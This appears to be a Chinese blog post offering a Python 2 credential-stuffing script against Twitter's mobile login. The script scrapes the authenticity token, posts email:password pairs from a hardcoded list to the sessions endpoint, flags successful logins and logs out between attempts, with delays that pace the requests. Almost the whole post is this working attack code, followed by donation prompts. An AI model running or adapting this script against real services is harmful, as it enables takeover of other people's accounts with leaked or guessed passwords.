A-A+
Twitter推特登陆接口可撞库 Python代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 | #!/usr/bin/env python
# encoding: utf-8
# email: ringzero@0x557.org
import json
import re
import requests
import time
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
requests = requests.Session()
headers = {
'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13',
'accept-language': 'zh-CN,zh;q=0.8,en;q=0.6',
'origin': 'https://mobile.twitter.com',
'pragma': 'no-cache',
'referer': 'https://mobile.twitter.com/login',
'upgrade-insecure-requests': '1',
}
class Twitter_Login(object):
"""docstring for Twitter_Login"""
def __init__(self):
super(Twitter_Login, self).__init__()
self.website = 'https://mobile.twitter.com'
def parser_token(self, content):
auth_token = re.search('authenticity_token" type="hidden" value="(.*?)"/>', content)
return auth_token.group(1) if auth_token else None
def init_token(self):
url = '{0}/login'.format(self.website)
content = requests.get(url, headers=headers, allow_redirects=True).content
return content
def parser_success(self, email, content):
if email in content or '记录不匹配' in content:
return False
else:
return True
def session(self, token, email, password):
payload = {
'authenticity_token' : token,
'session[username_or_email]' : email,
'session[password]': password,
'remember_me' : 1,
'wfa' : 1,
'commit' :'登入',
}
url = '{0}/sessions'.format(self.website)
result = requests.post(url,
headers=headers,
data=payload,
allow_redirects=True)
return result
def run(self):
session_content = self.init_token()
userdict = [
'ring05h@gmail.com:123456',
'ring07h@gmail.com:123456',
'ring08h@gmail.com:123456',
'ring04h@gmail.com:truepassword',
'ring09h@gmail.com:123456',
'ring10h@gmail.com:123456',
'ring11h@gmail.com:123456',
'ring12h@gmail.com:123456',
'ring13h@gmail.com:123456',
'ring14h@gmail.com:123456',
'ring15h@gmail.com:123456',
'ring16h@gmail.com:123456',
'ring17h@gmail.com:123456',
'ring18h@gmail.com:123456',]
for combo in userdict:
token = self.parser_token(session_content)
if token is not None:
email, password = combo.split(':')
print 'Starting check {0} : {1}'.format(email, password)
session_content = self.session(token, email, password).content
if self.parser_success(email, session_content):
print email, password, 'login success.'
self.destroy()
time.sleep(2)
session_content = self.init_token()
time.sleep(3)
def destroy(self):
print 'call destroy()'
url = '{0}/account'.format(self.website)
content = requests.get(url, headers=headers, allow_redirects=True).content
token = self.parser_token(content)
if token is not None:
# destroy logout
url = '{0}/session/destroy'.format(self.website)
payload = {
'authenticity_token': token,
'commit': '登出'
}
result = requests.post(url,
headers=headers,
data=payload,
allow_redirects=True)
twitter = Twitter_Login()
twitter.run() |
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏